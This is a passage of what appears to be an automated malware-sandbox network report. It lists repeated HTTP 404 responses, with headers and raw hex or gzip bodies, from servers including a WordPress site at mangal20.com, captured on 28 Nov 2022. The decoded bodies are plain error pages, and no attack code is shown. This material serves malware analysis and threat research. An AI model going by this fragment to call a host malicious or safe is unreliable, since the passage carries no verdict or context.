2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 28 Nov 2022 09:25:02 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 28 Nov 2022 09:25:05 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 28 Nov 2022 09:25:07 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:25:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.21Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://mangal20.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 66 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5d 79 73 1b c7 b1 ff 5b aa 7a df 61 05 17 49 c0 c1 2e ee 83 07 e8 b2 65 3b 95 7a 71 e2 b2 ec f7 ea 95 a5 52 2d 80 05 b0 32 80 45 76 17 3c 42 ab 8a be 75 58 87 4f 39 96 14 5b 8e 95 d8 89 4d c9 47 6c 4a b2 a4 ef 12 13 20 f8 57 be c2 fb f5 cc ee 62 77 b1 00 41 52 8a f3 9e 45 4a 20 76 a6 a7 bb a7 a7 a7 a7 67 a6 67 76 ee c0 e3 bf 3d f8 ec ff 3c fd 84 50 33 1b f5 f9 fd 73 f4 47 a8 cb cd 6a 21 f4 fb 9a 78 f0 37 21 a1 54 97 0d a3 10 6a 6a e2 31 23 44 10 8a 5c 9e df bf 6f ae a1 98 b2 50 aa c9 ba a1 98 85 d0 73 cf 3e 29 e6 43 42 6c 5e b0 b3 9a 72 43 29 84 16 54 65 b1 a5 e9 26 f0 68 4d 53 69 02 74 51 2d 9b b5 42 59 59 50 4b 8a c8 1e a2 82 da 54 4d 55 ae 8b 46 49 ae 2b 85 04 21 02 9e ba da 7c 41 d0 95 7a 21 d4 d2 b5 8a 5a 57 42 42 4d 57 2a 85 50 cd 34 5b 33 b1 58 b5 d1 aa 4a 9a 5e 8d 2d 55 9a b1 44 02 dc ed 9b 33 4a ba da 32 e7 c3 95 76 b3 64 aa 5a 33 4c 35 8a ac d0 a7 c4 aa f2 1b f0 25 14 58 7d fb 09 92 ae b4 ea 72 49 09 c7 0e 17 59 4d 0f 17 63 d1 a9 63 c6 54 e4 78 24 5c d6 4a ed 06 58 97 ec 2f 4f d4 15 7a 8e cc ce c5 2c 72 fb e7 4c d5 ac 2b f3 dd 4b 7f ed 9e bc d3 39 71 7d eb ca df b7 2e 7f 32 17 e3 c9 5c 58 4c 22 53 ba 56 d4 4c 63 ca 91 c7 54 43 5e 12 d5 86 5c 55 c4 96 0e a1 28 8b 33 75 59 af 2a 53 24 83 be 08 a6 ca 4d 83 00 2a 8a 59 aa 4d 71 39 4c c5 62 15 48 d5 90 aa 9a 56 ad 2b 72 4b 35 a4 92 d6 f0 95 0c c9 75 53 d1 9b b2 09 f1 99 cb 2d 34 8a dc 6a d5 d5 92 4c e2 89 e9 86 f1 8b a5 46 1d 59 54 81 42 a8 fb e5 9f 7a 7f 79 75 e3 c6 f5 cd f3 af 3c fa f4 d3 9d 33 2f 6d dc fe a6 7b f6 ed de 95 37 c5 ce da 07 dd f7 6f 74 cf 7e d6 3b 73 5e 98 d4 e5 df b5 b5 59 e1 49 45 29 fb da a5 01 fd 91 eb c9 38 31 13 ab 20 3f c6 1a d4 d5 9e f7 97 a5 de b5 57 7b 6b 37 b7 63 0c cc 51 2b 1a 6e 0e 79 73 5a 62 32 95 25 33 76 4c 5e 90 79 2a d4 6b 51 6d 96 b5 45 e9 e8 62 4b 69 68 c7 d4 43 8a 69 aa cd aa 01 75 5a 09 15 65 43 79 4e af 87 66 98 76 1a 33 87 63 87 63 86 b4 48 fa 79 38 c6 da d7 38 1c 2b 69 ba 72 38 c6 0a 1f 8e 25 d2 52 5c 8a 1f 8e e5 92 4b b9 e4 e1 58 28 1a 02 41 94 97 5a cd 2a 1e 8c 85 ea ee f0 a1 20 c3 86 bf 4f 70 84 f8 46 cf 5a 5b 2f 29 a1 99 95 10 fa 22 9a 9f b1 61 f1 cb d8 75 b7 db e1 d8 62 4b 54 9b a5 7a bb 4c 8c a3 47 50 02 2b 22 a2 4b 2a a8 ad d4 50 9b d2 31 e3 91 05 45 2f 64 a5 84 94 08 1d 3f 3e bb 3f f6 f0 01 e1 d9 9a 6a 08 d4 61 05 fc 95 db a6 26 56 95 a6 a2 83 64 59 78 38 b6 ff 80 d3 39 95 a8 1c 35 23 2b 0b b2 2e 34 a3 7a 54 8b aa 05 59 2a e9 0a 20 ad 4e 16 0e 95 e4 26 9a 20 14 89 b6 0a aa 54 55 cc 83 64 48 96 cc c9 49 f7 53 38 94 2c 87 22 b3 36 62 c1 08 2b 36 62 b9 70 c8 d4 d1 4c 52 45 d7 1a 07 61 b0 0e 6a 65 25
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:25:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.21Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://mangal20.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 66 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5d 79 73 1b c7 b1 ff 5b aa 7a df 61 05 17 49 c0 c1 2e ee 83 07 e8 b2 65 3b 95 7a 71 e2 b2 ec f7 ea 95 a5 52 2d 80 05 b0 32 80 45 76 17 3c 42 ab 8a be 75 58 87 4f 39 96 14 5b 8e 95 d8 89 4d c9 47 6c 4a b2 a4 ef 12 13 20 f8 57 be c2 fb f5 cc ee 62 77 b1 00 41 52 8a f3 9e 45 4a 20 76 a6 a7 bb a7 a7 a7 a7 67 a6 67 76 ee c0 e3 bf 3d f8 ec ff 3c fd 84 50 33 1b f5 f9 fd 73 f4 47 a8 cb cd 6a 21 f4 fb 9a 78 f0 37 21 a1 54 97 0d a3 10 6a 6a e2 31 23 44 10 8a 5c 9e df bf 6f ae a1 98 b2 50 aa c9 ba a1 98 85 d0 73 cf 3e 29 e6 43 42 6c 5e b0 b3 9a 72 43 29 84 16 54 65 b1 a5 e9 26 f0 68 4d 53 69 02 74 51 2d 9b b5 42 59 59 50 4b 8a c8 1e a2 82 da 54 4d 55 ae 8b 46 49 ae 2b 85 04 21 02 9e ba da 7c 41 d0 95 7a 21 d4 d2 b5 8a 5a 57 42 42 4d 57 2a 85 50 cd 34 5b 33 b1 58 b5 d1 aa 4a 9a 5e 8d 2d 55 9a b1 44 02 dc ed 9b 33 4a ba da 32 e7 c3 95 76 b3 64 aa 5a 33 4c 35 8a ac d0 a7 c4 aa f2 1b f0 25 14 58 7d fb 09 92 ae b4 ea 72 49 09 c7 0e 17 59 4d 0f 17 63 d1 a9 63 c6 54 e4 78 24 5c d6 4a ed 06 58 97 ec 2f 4f d4 15 7a 8e cc ce c5 2c 72 fb e7 4c d5 ac 2b f3 dd 4b 7f ed 9e bc d3 39 71 7d eb ca df b7 2e 7f 32 17 e3 c9 5c 58 4c 22 53 ba 56 d4 4c 63 ca 91 c7 54 43 5e 12 d5 86 5c 55 c4 96 0e a1 28 8b 33 75 59 af 2a 53 24 83 be 08 a6 ca 4d 83 00 2a 8a 59 aa 4d 71 39 4c c5 62 15 48 d5 90 aa 9a 56 ad 2b 72 4b 35 a4 92 d6 f0 95 0c c9 75 53 d1 9b b2 09 f1 99 cb 2d 34 8a dc 6a d5 d5 92 4c e2 89 e9 86 f1 8b a5 46 1d 59 54 81 42 a8 fb e5 9f 7a 7f 79 75 e3 c6 f5 cd f3 af 3c fa f4 d3 9d 33 2f 6d dc fe a6 7b f6 ed de 95 37 c5 ce da 07 dd f7 6f 74 cf 7e d6 3b 73 5e 98 d4 e5 df b5 b5 59 e1 49 45 29 fb da a5 01 fd 91 eb c9 38 31 13 ab 20 3f c6 1a d4 d5 9e f7 97 a5 de b5 57 7b 6b 37 b7 63 0c cc 51 2b 1a 6e 0e 79 73 5a 62 32 95 25 33 76 4c 5e 90 79 2a d4 6b 51 6d 96 b5 45 e9 e8 62 4b 69 68 c7 d4 43 8a 69 aa cd aa 01 75 5a 09 15 65 43 79 4e af 87 66 98 76 1a 33 87 63 87 63 86 b4 48 fa 79 38 c6 da d7 38 1c 2b 69 ba 72 38 c6 0a 1f 8e 25 d2 52 5c 8a 1f 8e e5 92 4b b9 e4 e1 58 28 1a 02 41 94 97 5a cd 2a 1e 8c 85 ea ee f0 a1 20 c3 86 bf 4f 70 84 f8 46 cf 5a 5b 2f 29 a1 99 95 10 fa 22 9a 9f b1 61 f1 cb d8 75 b7 db e1 d8 62 4b 54 9b a5 7a bb 4c 8c a3 47 50 02 2b 22 a2 4b 2a a8 ad d4 50 9b d2 31 e3 91 05 45 2f 64 a5 84 94 08 1d 3f 3e bb 3f f6 f0 01 e1 d9 9a 6a 08 d4 61 05 fc 95 db a6 26 56 95 a6 a2 83 64 59 78 38 b6 ff 80 d3 39 95 a8 1c 35 23 2b 0b b2 2e 34 a3 7a 54 8b aa 05 59 2a e9 0a 20 ad 4e 16 0e 95 e4 26 9a 20 14 89 b6 0a aa 54 55 cc 83 64 48 96 cc c9 49 f7 53 38 94 2c 87 22 b3 36 62 c1 08 2b 36 62 b9 70 c8 d4 d1 4c 52 45 d7 1a 07 61 b0 0e 6a 65 25
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:25:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.21Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://mangal20.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 66 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5d 79 73 1b c7 b1 ff 5b aa 7a df 61 05 17 49 c0 c1 2e ee 83 07 e8 b2 65 3b 95 7a 71 e2 b2 ec f7 ea 95 a5 52 2d 80 05 b0 32 80 45 76 17 3c 42 ab 8a be 75 58 87 4f 39 96 14 5b 8e 95 d8 89 4d c9 47 6c 4a b2 a4 ef 12 13 20 f8 57 be c2 fb f5 cc ee 62 77 b1 00 41 52 8a f3 9e 45 4a 20 76 a6 a7 bb a7 a7 a7 a7 67 a6 67 76 ee c0 e3 bf 3d f8 ec ff 3c fd 84 50 33 1b f5 f9 fd 73 f4 47 a8 cb cd 6a 21 f4 fb 9a 78 f0 37 21 a1 54 97 0d a3 10 6a 6a e2 31 23 44 10 8a 5c 9e df bf 6f ae a1 98 b2 50 aa c9 ba a1 98 85 d0 73 cf 3e 29 e6 43 42 6c 5e b0 b3 9a 72 43 29 84 16 54 65 b1 a5 e9 26 f0 68 4d 53 69 02 74 51 2d 9b b5 42 59 59 50 4b 8a c8 1e a2 82 da 54 4d 55 ae 8b 46 49 ae 2b 85 04 21 02 9e ba da 7c 41 d0 95 7a 21 d4 d2 b5 8a 5a 57 42 42 4d 57 2a 85 50 cd 34 5b 33 b1 58 b5 d1 aa 4a 9a 5e 8d 2d 55 9a b1 44 02 dc ed 9b 33 4a ba da 32 e7 c3 95 76 b3 64 aa 5a 33 4c 35 8a ac d0 a7 c4 aa f2 1b f0 25 14 58 7d fb 09 92 ae b4 ea 72 49 09 c7 0e 17 59 4d 0f 17 63 d1 a9 63 c6 54 e4 78 24 5c d6 4a ed 06 58 97 ec 2f 4f d4 15 7a 8e cc ce c5 2c 72 fb e7 4c d5 ac 2b f3 dd 4b 7f ed 9e bc d3 39 71 7d eb ca df b7 2e 7f 32 17 e3 c9 5c 58 4c 22 53 ba 56 d4 4c 63 ca 91 c7 54 43 5e 12 d5 86 5c 55 c4 96 0e a1 28 8b 33 75 59 af 2a 53 24 83 be 08 a6 ca 4d 83 00 2a 8a 59 aa 4d 71 39 4c c5 62 15 48 d5 90 aa 9a 56 ad 2b 72 4b 35 a4 92 d6 f0 95 0c c9 75 53 d1 9b b2 09 f1 99 cb 2d 34 8a dc 6a d5 d5 92 4c e2 89 e9 86 f1 8b a5 46 1d 59 54 81 42 a8 fb e5 9f 7a 7f 79 75 e3 c6 f5 cd f3 af 3c fa f4 d3 9d 33 2f 6d dc fe a6 7b f6 ed de 95 37 c5 ce da 07 dd f7 6f 74 cf 7e d6 3b 73 5e 98 d4 e5 df b5 b5 59 e1 49 45 29 fb da a5 01 fd 91 eb c9 38 31 13 ab 20 3f c6 1a d4 d5 9e f7 97 a5 de b5 57 7b 6b 37 b7 63 0c cc 51 2b 1a 6e 0e 79 73 5a 62 32 95 25 33 76 4c 5e 90 79 2a d4 6b 51 6d 96 b5 45 e9 e8 62 4b 69 68 c7 d4 43 8a 69 aa cd aa 01 75 5a 09 15 65 43 79 4e af 87 66 98 76 1a 33 87 63 87 63 86 b4 48 fa 79 38 c6 da d7 38 1c 2b 69 ba 72 38 c6 0a 1f 8e 25 d2 52 5c 8a 1f 8e e5 92 4b b9 e4 e1 58 28 1a 02 41 94 97 5a cd 2a 1e 8c 85 ea ee f0 a1 20 c3 86 bf 4f 70 84 f8 46 cf 5a 5b 2f 29 a1 99 95 10 fa 22 9a 9f b1 61 f1 cb d8 75 b7 db e1 d8 62 4b 54 9b a5 7a bb 4c 8c a3 47 50 02 2b 22 a2 4b 2a a8 ad d4 50 9b d2 31 e3 91 05 45 2f 64 a5 84 94 08 1d 3f 3e bb 3f f6 f0 01 e1 d9 9a 6a 08 d4 61 05 fc 95 db a6 26 56 95 a6 a2 83 64 59 78 38 b6 ff 80 d3 39 95 a8 1c 35 23 2b 0b b2 2e 34 a3 7a 54 8b aa 05 59 2a e9 0a 20 ad 4e 16 0e 95 e4 26 9a 20 14 89 b6 0a aa 54 55 cc 83 64 48 96 cc c9 49 f7 53 38 94 2c 87 22 b3 36 62 c1 08 2b 36 62 b9 70 c8 d4 d1 4c 52 45 d7 1a 07 61 b0 0e 6a 65 25
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:25:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
